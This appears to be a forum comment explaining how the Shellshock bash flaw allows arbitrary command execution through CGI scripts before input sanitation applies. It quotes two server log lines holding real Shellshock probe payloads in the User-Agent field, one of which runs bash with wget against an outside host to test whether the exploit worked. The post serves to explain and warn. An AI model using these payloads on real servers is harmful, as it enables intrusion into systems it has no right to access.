
In the case of a CGI exploit, it allows arbitrary commands to be executed, and this is even before the actual CGI site sees the data, so sanitation in the CGI executable will have no effect. Even under a limited user this can be used for various nefarious purposes. And I'm sure there are poorly configured servers out there that have Apache running as root. :smackbutt:
Here's a couple attempts I found in the HTG server logs. They are just pinging or hitting a page on another site that the hacker has access to so they can test to see if the exploit worked. Or echoing some string they can detect as part of their probe. They are probably gathering a list of IPs that are vulnerable so they can later do nastier things such as setting up a spambot.
Code:
94.102.60.177 - - [26/Sep/2014:07:50:41 -0700] "GET /cgi-bin/test.cgi HTTP/1.1" 404 543 "-" "() { x;};echo;echo 123456ololo | md5sum" 83.166.234.133 - - [26/Sep/2014:21:55:28 -0700] "GET / HTTP/1.0" 200 24057 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://htguide.com/\""
Leave a comment: